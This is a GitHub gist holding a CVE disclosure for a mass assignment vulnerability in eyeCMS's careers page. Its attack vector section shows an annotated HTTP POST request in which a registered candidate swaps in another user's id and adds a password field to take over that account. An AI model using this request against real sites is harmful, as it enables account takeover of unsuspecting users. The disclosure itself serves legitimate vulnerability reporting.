Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
[Suggested description]
A mass assignment vulnerability in eyecomms eyeCMS through 2019-10-15 allows any
candidate to take over another candidate's account (by also exploiting CVE-2019-17604) via
a modified candidate id and an additional password parameter,
The outcome is that the password of this other candidate is changed.
[Vendor of Product]
[Affected Product Code Base]
eyeCMS - unknown version (commercial)
[Affected Component]
careers page
[CVE Impact Other]
Takeover other users' account
[Attack Vectors]
to exploit the vulnerability, attacker should register as a candidate.
POST /candidates/profile HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNpWnwAzZI1eCzzi6
Cookie: XSRF-TOKEN=RBKoyftI3JftAA1TvxuSWI3JftAA1TvxuSWyKOSDwzkiYE9wSt; laravel_session=S1evI3JftAA1TvxuSWyKOSDwzkiYoIGBX4YUfjC7dDHKV;
Content-Disposition: form-data; name="_token"
Content-Disposition: form-data; name="id"
4456 <-- change this to any other user id
Content-Disposition: form-data; name="password" <-- Add this parameter
Content-Disposition: form-data; name="first_name"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.